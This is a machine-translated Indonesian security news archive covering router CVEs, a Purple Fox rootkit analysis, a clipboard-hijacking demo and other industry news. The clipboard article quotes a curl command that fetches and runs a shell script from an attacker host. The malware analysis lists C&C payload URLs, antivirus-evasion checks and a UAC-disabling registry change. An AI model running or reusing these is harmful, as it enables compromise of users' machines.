Naga Cyber Defense

Trusted Security for all of Indonesia

You are here: Home / Archives for News

AMD Mengalahkan Intel dengan CPU Pertama yang Memiliki Keamanan Seperti Xbox untuk Windows

by

AMD meluncurkan prosesor laptop Ryzen 6000 hari ini, dan mereka adalah yang pertama memasukkan prosesor keamanan Pluton baru Microsoft. Ini adalah chip keamanan baru yang dirancang untuk membawa keamanan seperti Xbox ke PC Windows, untuk mengamankan kunci perangkat keras dan kriptografi.

Anehnya, AMD adalah yang pertama keluar dari pintu dengan CPU yang menampilkan Pluton, mengalahkan Intel dan Qualcomm untuk mengintegrasikan fitur keamanan Windows terbaru. Pluton dirancang untuk memblokir vektor serangan baru dan muncul yang sering digunakan untuk mengkompromikan PC.

Microsoft telah mengambil pembelajarannya dari Xbox, yang memiliki perlindungan serangan fisik, untuk mencoba membawa perlindungan serupa ke PC Windows. Pluton pada dasarnya adalah evolusi dari Trusted Platform Module (TPM) yang dipatri langsung ke CPU.

“Seri Ryzen 6000 akan menjadi prosesor PC pertama yang mengintegrasikan prosesor keamanan Microsoft Pluton,” jelas CEO AMD Lisa Su saat konferensi pers CES 2022 hari ini. “Kerja sama pengembangan kami dengan Microsoft menghilangkan seluruh vektor serangan pada notebook, lebih baik melindungi data penting seperti kredensial sistem, identitas pengguna, kunci enkripsi, dan informasi pribadi.”

Pluton akan dimasukkan dalam prosesor AMD seri Ryzen 6000 baru pada berbagai laptop. AMD juga menjanjikan pengeditan video hingga 69 persen lebih cepat, lebih dari dua kali lipat kinerja rendering 3D, dan menggandakan kinerja game 1080p dengan chip baru ini.

Sumber: The Verge

Netgear Meninggalkan Kerentanan yang Tidak Ditambal di Router Nighthawk

by

Para peneliti telah menemukan setengah lusin kerentanan berisiko tinggi dalam versi firmware terbaru untuk router Netgear Nighthawk R6700v3. Pada saat penerbitan kekurangan tetap tidak ditampat.

Nighthawk R6700 adalah router WiFi dual-bank populer yang diiklankan dengan fitur yang berfokus pada game, kontrol orang tua yang cerdas, dan perangkat keras internal yang cukup kuat untuk mengakomodasi kebutuhan pengguna daya rumah.

Enam kekurangan ditemukan oleh para peneliti di perusahaan cybersecurity Tenable dan dapat memungkinkan penyerang di jaringan untuk mengambil kendali penuh atas perangkat:

  • CVE-2021-20173: Cacat injeksi perintah pasca-otentikasi dalam fungsi pembaruan perangkat, membuatnya rentan terhadap injeksi perintah.
  • CVE-2021-20174: HTTP digunakan secara default pada semua komunikasi antarmuka web perangkat, mempertaruhkan intersepsi nama pengguna dan kata sandi dalam bentuk cleartext.
  • CVE-2021-20175: SOAP Interface (port 5000) menggunakan HTTP untuk berkomunikasi secara default, mempertaruhkan intersepsi nama pengguna dan kata sandi dalam bentuk cleartext.
  • CVE-2021-23147: Eksekusi perintah sebagai root tanpa otentikasi melalui koneksi port UART. Mengeksploitasi cacat ini membutuhkan akses fisik ke perangkat.
  • CVE-2021-45732: Manipulasi konfigurasi melalui rutinitas enkripsi hardcoded, memungkinkan perubahan pengaturan yang terkunci karena alasan keamanan.
  • CVE-2021-45077: Semua nama pengguna dan kata sandi untuk layanan perangkat disimpan dalam bentuk plaintext dalam file konfigurasi.

Kekurangan yang baru-baru ini diungkapkan mempengaruhi firmware versi 1.0.4.120, yang merupakan rilis terbaru untuk perangkat.

Pengguna disarankan untuk mengubah kredensial default menjadi sesuatu yang unik dan kuat dan mengikuti praktik keamanan yang direkomendasikan untuk pertahanan yang lebih kuat terhadap infeksi malware.

Juga, periksa portal unduhan firmware Netgear secara teratur dan instal versi baru segera setelah tersedia. Mengaktifkan pembaruan otomatis pada router Anda juga disarankan.

Laporan keamanan saat ini mengacu pada Netgear R6700 v3, yang masih di bawah dukungan, bukan Netgear R6700 v1 dan R6700 v2, yang telah mencapai akhir kehidupan. Jika Anda masih menggunakan model yang lebih lama, disarankan untuk menggantinya.

Tenable mengungkapkan masalah di atas kepada vendor pada tanggal 30 September 2021, dan meskipun beberapa pertukaran informasi dalam bentuk klarifikasi dan saran terjadi sesudahnya, masalah tetap tidak terselesaikan.

Kami telah menghubungi Netgear untuk meminta komentar tentang hal di atas, dan kami akan menambahkan pembaruan ke cerita ini segera setelah kami mendengar kembali dari mereka.

Sumber: Bleepingcomputer

Aplikasi Tanya Jawab Populer, Curious Cat kehilangan domain, memposting tweet aneh

by

Aplikasi jejaring sosial populer, Curious Cat telah kehilangan kendali atas domainnya. Setelah platform mengumumkan kehilangan kendali atas domain mereka, serangkaian peristiwa aneh dan tanggapan dukungan telah membingungkan pengguna aplikasi yang sekarang tidak dapat mempercayai Curious Cat.

Kecurigaan awal layanan Curious Cat telah ditutup muncul sekitar 19 Desember, ketika pengunjung Curiouscat.qa disambut dengan halaman parkir yang bertentangan dengan layanan jejaring sosial.

Curiouscat.qa menampilkan pesan “Duduklah. Kami sedang menjalani pemeliharaan,” dengan logo kucing yang sama sekali berbeda dari logo resmi platform sosial.

Logo resmi Curious Cat (kiri) dan halaman web Curiouscat.qa terlihat hari ini (kanan)

Catatan WHOIS mengkonfirmasi bahwa sekitar tanggal 18 Desember domain tersebut telah memasuki status ‘pendingDelete’. Sebuah domain memasuki status ‘pendingDelete’ segera setelah masa tenggang setelah pemilik domain gagal memperbarui domain.

Empat hari yang lalu, akun Twitter Curious Cat memposting peringatan bahwa mereka telah kehilangan domain Curiouscat.qa mereka karena “kesalahan” dan bahwa layanan telah pindah ke domain Curiouscat.me dan Curiouscat.live.

Pada tahun 2020, Google kehilangan kepemilikan domain blogspot.in setelah gagal memperbaruinya tepat waktu. Setelah domain diambil alih oleh pihak ketiga, lebih dari 4,4 juta URL blogspot.in tidak lagi dapat diakses.

Namun, dalam kasus Curious Cat, seolah-olah hilangnya domain secara tiba-tiba itu sendiri tidak berubah, rangkaian kicauan platform mengikis kepercayaan pengguna lebih jauh.

Pada tanggal 27 Desember, permohonan dari akun media sosial Curious Cat untuk mengunduh “aplikasi iOS yang dipulihkan” membuat banyak orang bingung, dengan beberapa menahan diri dari pembaruan.

Sumber kebingungan lainnya adalah staf Spanyol Curious Cat yang tampaknya “meninggalkan [sic] untuk saat ini.”

Tim pendukung Curious Cat tampaknya “sekarang” dikelola oleh staf Korea, dilaporkan di balik tweet, meskipun asal perusahaan adalah Spanyol.

Curious Cat mengatakan mereka sekarang dikelola oleh tim Korea sekarang

Namun, itu belum berakhir. Di Google Play, pengguna aplikasi Android melaporkan masalah setelah aplikasi Curious Cat tidak dapat berkomunikasi dengan API Twitter, kemungkinan karena integrasi yang rusak.

Sangat mungkin, tweet Curious Cat yang mengacu pada aplikasi “pulih” yang diperbarui menunjukkan platform yang memulihkan integrasi API Twitter setelah nama domainnya diubah.

Namun, setelah serangkaian peristiwa aneh ini, banyak pelanggan Curious Cat [1, 2, 3, 4] telah memutuskan untuk menjaga jarak dari layanan tersebut, dengan beberapa memutuskan Curious Cat dari Twitter mereka hingga situasi menjadi lebih jelas.

Selengkapnya : Bleeping Computer

Google mengakuisisi startup keamanan siber Siemplify seharga $500 juta

by

Google mengakuisisi startup cybersecurity Israel Siemplify, Harga akuisisi tersebut diperkirakan mencapai $500 juta. Siemplify mempekerjakan 200 orang di Israel, AS, dan London, yang akan bergabung dengan Google setelah akuisisi.

Google akan menggunakan Siemplify untuk membentuk dasar bagi operasi keamanan sibernya di Israel yang akan menjadi bagian dari aktivitas cloud perusahaan. Pendiri Siemplify akan melanjutkan di perusahaan.

CEO Google Sundar Pichai berjanji kepada Presiden AS Joe Biden bahwa perusahaan akan menginvestasikan $10 miliar dalam keamanan siber selama lima tahun ke depan. Google berencana memperluas program tanpa kepercayaan, membantu mengamankan rantai pasokan perangkat lunak, dan meningkatkan keamanan sumber terbuka.

Perusahaan berjanji untuk melatih 100.000 orang Amerika di bidang-bidang seperti Dukungan TI dan Analisis Data, mempelajari keterampilan sesuai permintaan termasuk privasi dan keamanan data. Janji ini akan mencakup akuisisi dan investasi, dengan Siemplify menjadi pembelian pertama Google yang telah menginvestasikan $50 juta di perusahaan keamanan siber Israel lainnya, Cybereason, tahun lalu.

Siemplify telah mengumpulkan $58 juta selama empat putaran hingga saat ini, dengan VC G20 Ventures Israel sebagai pemegang saham terbesar perusahaan. Investor tambahan termasuk 83North, Jump Capital, dan Georgian, yang baru-baru ini juga berinvestasi di startup keamanan siber Israel Noname Security.

Platform Operasi Keamanan Siemplify dirancang untuk menjadi “sistem operasi” SOC (pusat operasi keamanan). Tidak seperti platform SOAR (orkestrasi keamanan, otomatisasi, dan respons) lainnya yang sebagian besar berfokus pada pembuatan buku pedoman dan otomatisasi, Siemplify dirancang untuk mengelola seluruh fungsi operasi keamanan dari ujung ke ujung. Platform perusahaan akan diintegrasikan ke dalam sistem cloud Google.

Analis dapat memprioritaskan ancaman yang berpotensi diabaikan, memungkinkan mereka untuk menyelidiki, sebagai satu, peringatan yang mungkin telah diterima dari sensor keamanan terpisah tetapi merupakan bagian dari ancaman yang sama.

Akuisisi terbesar Google di Israel hingga saat ini adalah kesepakatan $1,1 miliar untuk Waze pada 2016. Pada 2019, Google Cloud mengakuisisi perusahaan Israel Elastifile seharga $200 juta dan Aluma seharga $100 juta

Sumber : CTECH

Installer Telegram Menjatuhkan Rootkit Purple Fox

by

Kami sering mengamati aktor ancaman menggunakan perangkat lunak yang sah untuk menjatuhkan file berbahaya. Namun kali ini berbeda. Aktor ancaman ini mampu meninggalkan sebagian besar serangan di bawah radar dengan memisahkan serangan ke dalam beberapa file kecil, yang sebagian besar memiliki tingkat deteksi yang sangat rendah oleh mesin AV, dengan tahap akhir yang mengarah ke infeksi rootkit Purple Fox.

Berkat MalwareHunterTeam, kami dapat menggali lebih dalam ke dalam Telegram Installer yang berbahaya. Installer ini adalah autoit dikompilasi (freeware BASIC-seperti scripting bahasa yang dirancang untuk mengotomatisasi Windows GUI dan scripting umum) script yang disebut “Telegram Desktop.exe”:

Skrip AutoIt ini adalah tahap pertama dari serangan yang menciptakan folder baru bernama “TextInputh” di bawah C:UsersUsernameAppDataLocalTemp dan menjatuhkan penginstal Telegram yang sah (yang bahkan tidak dieksekusi) dan pengunduh berbahaya (TextInputh.exe).

Saat dijalankan, TextInputh.exe membuat folder baru bernama “1640618495” di bawah direktori C:UsersPublicVideos. TextInputh.exe file digunakan sebagai pengunduh untuk tahap berikutnya dari serangan. Ini menghubungi server C&C dan mengunduh dua file ke folder yang baru dibuat:

  • 1.rar – yang berisi file untuk tahap berikutnya. 7zz.exe – archiver 7z yang sah.
  • 7zz.exe digunakan untuk unarchive 1.rar, yang berisi file-file berikut:

Selanjutnya, TextInputh.exe melakukan tindakan berikut:

  • Menyalin 360.tct dengan nama “360.dll”, rundll3222.exe dan svchost.txt ke folder ProgramData
  • Mengeksekusi ojbk.exe dengan baris perintah “ojbk.exe -a”
  • Menghapus 1.rar dan 7zz.exe dan keluar dari proses

ojbk.exe
Ketika dijalankan dengan argumen “-a”, file ini hanya digunakan untuk secara reflektif memuat file berbahaya 360.dll:

DLL ini bertanggung jawab untuk membaca file svchost.txt yang dijatuhkan. Setelah itu, kunci registri HKEY_LOCAL_MACHINESYSTEMSelectMarkTime baru dibuat, yang nilainya sama dengan waktu svchost saat ini.exe dan kemudian, muatan svchost.txt dieksekusi.

svchost.txt
Saat aliran serangan berlanjut, file ini tampaknya berisi kode byte dari tahap berikutnya dari muatan berbahaya yang dieksekusi oleh 360.dll. Sebagai tindakan pertama svchost.txt, ia memeriksa keberadaan HKLM SOFTWAREMicrosoftWindowsCurrentVersionApp Paths360safe.exePath registry key. Jika kunci registri ditemukan, aliran serangan akan melakukan langkah tambahan sebelum melanjutkan ke tahap berikutnya:

Serangan tersebut menjatuhkan lima file lagi ke dalam folder ProgramData:

  • Calldriver.exe – file ini digunakan untuk mematikan dan memblokir inisiasi 360 AV
  • Driver.sys – setelah file ini dijatuhkan, layanan driver sistem baru bernama “Driver” dibuat dan dimulai pada PC dan BMD yang terinfeksi.txt dibuat dalam folder ProgramData
  • dll.dll – dieksekusi setelah bypass UAC. Teknik bypass UAC yang digunakan oleh svchost.txt adalah “bypass UAC menggunakan antarmuka CMSTPLUA COM” dan dijelaskan dengan baik di sini. Teknik ini umumnya digunakan oleh penulis ransomware LockBit dan BlackMatter. Dll.dll dijalankan dengan baris perintah “C:ProgramDatadll.dll, luohua”.
  • kill.bat – skrip batch yang dieksekusi setelah drop file berakhir. Naskahnya adalah:
  • speedmem2.hg – SQLite file

Semua file ini bekerja sama untuk mematikan dan memblokir inisiasi 360 proses AV dari ruang kernel, sehingga memungkinkan alat serangan tahap berikutnya (Purple Fox Rootkit, dalam kasus kami) berjalan tanpa terdeteksi.

Setelah file drop dan eksekusi, payload bergerak ke langkah berikutnya, yaitu komunikasi C &C. Seperti disebutkan di atas, jika HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp Paths360safe.exePath registry key tidak ditemukan, alurnya hanya melompat ke langkah ini.

Pertama, alamat C &C hardcoded ditambahkan sebagai mutex. Selanjutnya, informasi korban berikut dikumpulkan:

  • Nama host
  • CPU – dengan mengambil nilai HKLMHARDWAREDESCRIPTIONSystemCentralProcessor0 ~MHz registry key
  • Status memori
  • Tipe Kandar
  • Tipe Prosesor – dengan memanggil GetNativeSystemInfo dan memeriksa nilai wProcessorArchitecture.

Selanjutnya, malware memeriksa apakah ada proses berikut yang berjalan di PC korban:

  • 360tray.exe – 360 Total Security
  • 360sd.exe – 360 Total Security
  • kxetray.exe – Kingsoft Internet Security
  • KSafeTray.exe – Kingsoft Internet Security
  • QQPCRTP.exe – Tencent
  • HipsTray.exe – HeroBravo System Diagnostics
  • BaiduSd.exe – Baidu Anti-Virus
  • baiduSafeTray.exe – Baidu Anti-Virus
  • KvMonXP.exe – Jiangmin Anti-Virus
  • RavMonD.exe – Rising Anti-Virus
  • QUHLPSVC.EXE – Quick Heal Anti-Virus
  • mssecess.exe – Microsoft MSE
  • cfp.exe – COMODO Internet Security
  • SPIDer.exe
  • acs.exe
  • V3Svc.exe – AhnLab V3 Internet Security
  • AYAgent.aye – ALYac Software
  • avgwdsvc.exe – AVG Internet Security
  • f-secure.exe – F‑Secure Anti‑Virus
  • avp.exe – Kaspersky Anti-Virus
  • Mcshield.exe – McAfee Anti-Virus
  • egui.exe – ESET Smart Security
  • knsdtray.exe
  • TMBMSRV.exe – Trend Micro Internet Security
  • avcenter.exe – Avira Anti-Virus
  • ashDisp.exe – Avast Anti-Virus
  • rtvscan.exe – Symantec Anti-Virus
  • remupd.exe – Panda software
  • vsserv.exe – Bitdefender Total Security
  • PSafeSysTray.exe – PSafe System Tray
  • ad-watch.exe
  • K7TSecurity.exe – K7Security Suite
  • UnThreat.exe – UnThreat Anti-Virus

Tampaknya setelah pemeriksaan ini selesai, semua informasi yang dikumpulkan, termasuk produk keamanan mana yang berjalan, dikirim ke server C &C.

Pada saat penyelidikan, server C&C sudah down, tetapi pemeriksaan cepat dari alamat IP dan file terkait lainnya semua menunjukkan bahwa tahap terakhir dari serangan ini adalah download dan eksekusi dari Purple Fox Rootkit. Purple Fox menggunakan fungsi msi.dll, ‘MsiInstallProductA’, untuk mengunduh dan menjalankan muatannya. Payload adalah file .msi yang berisi shellcode terenkripsi termasuk versi 32-bit dan 64-bit. Setelah dijalankan, sistem akan dimulai ulang dengan registri ‘PendingFileRenameOperations’ untuk mengganti nama komponennya. Dalam kasus kami, Purple Fox Rootkit diunduh dari hxxp://144.48.243[.] 79:17674/C558B828.Png.

Dll.dll
DLL ini hanya digunakan untuk menonaktifkan UAC dengan mengatur tiga kunci registri berikut ke 0:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop

Calldriver.exe
Digunakan untuk mematikan dan memblokir inisiasi 360 proses AV dari ruang kernel. Teknik yang digunakan dijelaskan di sini di bawah paragraf “The ProcessKiller rootkit vs. produk keamanan”.

Kami menemukan sejumlah besar installer berbahaya yang memberikan versi rootkit Purple Fox yang sama menggunakan rantai serangan yang sama. Sepertinya beberapa dikirim melalui email, sementara yang lain kami anggap diunduh dari situs web phishing. Keindahan serangan ini adalah bahwa setiap tahap dipisahkan ke file yang berbeda yang tidak berguna tanpa seluruh set file. Ini membantu penyerang melindungi file-nya dari deteksi AV.

Minerva Labs mendeteksi hubungan proses berbahaya dan mencegah malware menulis dan mengeksekusi muatan berbahaya:

IOC’s
Hash:

  • 41769d751fa735f253e96a02d0cccadfec8c7298666a4caa5c9f90aaa826ecd1 – Telegram Desktop.exe
  • BAE1270981C0A2D595677A7A1FEFE8087B07FFEA061571D97B5CD4C0E3EDB6E0 – TextInputh.exe
  • af8eef9df6c1f5645c95d0e991d8f526fbfb9a368eee9ba0b931c0c3df247e41 – legitimate telegram installer
  • 797a8063ff952a6445c7a32b72bd7cd6837a3a942bbef01fc81ff955e32e7d0c – 1.rar
  • 07ad4b984f288304003b080dd013784685181de4353a0b70a0247f96e535bd56 – 7zz.exe
  • 26487eff7cb8858d1b76308e76dfe4f5d250724bbc7e18e69a524375cee11fe4 – 360.tct
  • b5128b709e21c2a4197fcd80b072e7341ccb335a5decbb52ef4cee2b63ad0b3e – ojbk.exe
  • 405f03534be8b45185695f68deb47d4daf04dcd6df9d351ca6831d3721b1efc4 – rundll3222.exe – legitimate rundll32.exe
  • 0937955FD23589B0E2124AFEEC54E916 – svchost.txt
  • e2c463ac2d147e52b5a53c9c4dea35060783c85260eaac98d0aaeed2d5f5c838 – Calldriver.exe
  • 638fa26aea7fe6ebefe398818b09277d01c4521a966ff39b77035b04c058df60 – Driver.sys
  • 4bdfa7aa1142deba5c6be1d71c3bc91da10c24e4a50296ee87bf2b96c731b7fa – dll.dll
  • 24BCBB228662B91C6A7BBBCB7D959E56 – kill.bat
  • 599DBAFA6ABFAF0D51E15AEB79E93336 – speedmem2.hg

IP’s:

  • 193.164.223[.]77 – second stage C&C server.
  • 144.48.243[.]79 – last stage C&C server.

Url:

  • hxxp://193.164.223[.]77:7456/h?=1640618495 – contains 1.rar file
  • hxxp://193.164.223[.]77:7456/77 – contain 7zz.exe file
  • hxxp://144.48.243[.]79:17674/C558B828.Png – Purple Fox Rootkit

Sumber daya:
https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox

Sumber: Minerva

Jangan salin tempel perintah dari halaman web — Anda bisa diretas

by

Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.

Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan yang lebih buruk lagi pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.

Dalam bukti konsep sederhana (PoC) yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang akan dikenal oleh sebagian besar sysadmin dan pengembang:

Halaman HTML Friedlander dengan perintah sederhana yang dapat Anda salin ke clipboard

Sekarang, tempelkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepad, dan hasilnya mungkin akan membuat Anda terkejut:

curl http://attacker-domain:8000/shell.sh | SH

Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memiliki karakter baris baru (atau kembali) di akhir.

Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familier dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.

Keajaibannya ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander. Setelah Anda menyalin teks “sudo apt update” yang terdapat dalam elemen HTML, cuplikan kode, yang ditampilkan di bawah ini berjalan.

Apa yang terjadi setelahnya adalah ‘pendengar acara’ JavaScript yang menangkap peristiwa penyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:

Kode JavaScript PoC yang menggantikan konten clipboard

“Inilah mengapa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda,” Friedlander memperingatkan.

“Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain, seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda.”

Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:

HTML yang tidak terlihat (kiri) diambil selama salin-tempel dan memiliki garis tambahan (kanan)

“Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript,” jelas pengguna, SwallowYourDreams.

“Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer.”

Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web—lebih baik tempel di editor teks terlebih dahulu.

Sumber : Bleeping Computer

Empat tahun layanan Aplikasi Azure memiliki bug kebocoran kode sumber

by

Microsoft telah mengungkapkan kerentanan dalam Layanan Aplikasi Azure untuk Linux yang memungkinkan pengunduhan file yang hampir pasti tidak ingin dipublikasikan oleh pengguna.

Microsoft menagih Layanan Aplikasi Azure sebagai hal yang tepat jika Anda ingin “Membuat aplikasi web dan seluler yang siap untuk perusahaan dengan cepat dan mudah untuk platform atau perangkat apa pun, dan menerapkannya pada infrastruktur cloud yang dapat diskalakan dan andal.”

Perhatikan bahwa deskripsi tidak menyebutkan keamanan.

Kelalaian itu anehnya terlihat, karena pakaian keamanan cloud Wiz menyelidiki layanan dan menemukan apa yang digambarkan sebagai “perilaku default tidak aman di Layanan Aplikasi Azure yang mengekspos kode sumber aplikasi pelanggan yang ditulis dalam PHP, Python, Ruby, atau Node, yang dikerahkan menggunakan ‘Local Git’.”

Wiz telah menamai cacat itu “NotLegit” dan menegaskan itu sudah ada sejak September 2017 dan “mungkin telah dieksploitasi di alam liar.”

Inti dari kelemahannya adalah ketika pengguna Layanan Aplikasi Azure mengunggah repositori git mereka ke layanan, repositori tersebut mendarat di direktori /home/site/wwwroot direktori yang dapat diakses publik. Di antara unggahan itu adalah folder .git, yang berisi kode sumber dan info rahasia lainnya. Semuanya tergantung di web untuk dilihat semua orang.

Orang-orang sedang mencari. Postingan Wiz menyatakan bahwa ia membuat aplikasi Layanan Aplikasi Azure yang rentan dan dalam empat hari mendeteksi beberapa upaya untuk mencapai folder .gitnya.

Wiz telah menemukan bug Azure yang buruk, ia juga menemukan kelemahan ChaosDB yang memungkinkan akses baca dan tulis yang tidak sah ke Microsoft Azure Cosmos DB, dan keluarga kelemahan “OMIGOD” yang memungkinkan eksekusi kode tidak sah di server Azure.

Microsoft membayar hadiah $7.500 kepada Wiz untuk menemukan kelemahannya, yang diungkapkan secara bertanggung jawab pada bulan September, dan melihat Microsoft memberi tahu pelanggan tentang masalah tersebut sebelum mengungkapkannya dalam posting blog tertanggal 22 Desember.

Sumber : The Register

Empat dari Lima Organisasi Meningkatkan Anggaran Cybersecurity di 2022

by

Ketika perusahaan merencanakan dan menetapkan anggaran untuk tahun baru ke depan, sebagian besar mengharapkan untuk menyalurkan lebih banyak dolar untuk meningkatkan upaya cybersecurity mereka. Menurut survei terbaru dari Dewan Keamanan Internasional Neustar (NISC), yang dilakukan pada November 2021, 81% organisasi telah berkomitmen untuk memperkuat anggaran cybersecurity mereka untuk 2022. Hampir seperempat (24%) responden meningkatkan alokasi antara 31% hingga 50% selama tahun lalu, sementara lebih dari empat dari sepuluh (41%) menaikkan anggaran 11% hingga 30%.

“Ketika lanskap ancaman cyber terus berkembang, organisasi dengan jelas mengakui kebutuhan mendesak untuk meningkatkan sistem dan proses mereka untuk menjaga setidaknya satu langkah di depan aktor jahat,” kata Carlos Morales, Wakil Presiden Senior, Solusi untuk Layanan Keamanan Neustar. “Data terbaru kami menunjukkan bahwa eksekutif tingkat atas dan anggota dewan sangat menyadari implikasi bisnis dari kesenjangan keamanan, dan itu membangun untuk melihat bahwa organisasi memiliki dukungan sepanjang jalan sampai rantai kepemimpinan untuk membuat investasi yang diperlukan untuk melindungi diri mereka sendiri dan klien mereka.”

Banyak organisasi mencari mitra eksternal untuk membantu menutup kesenjangan ini: 71% responden mengatakan mereka berencana untuk meningkatkan ketergantungan mereka pada vendor pihak ketiga. Membangun tim yang ada juga akan menjadi prioritas, dengan 56% berencana untuk menambah anggota tim baru di tahun mendatang.

Selengkapnya: DarkReading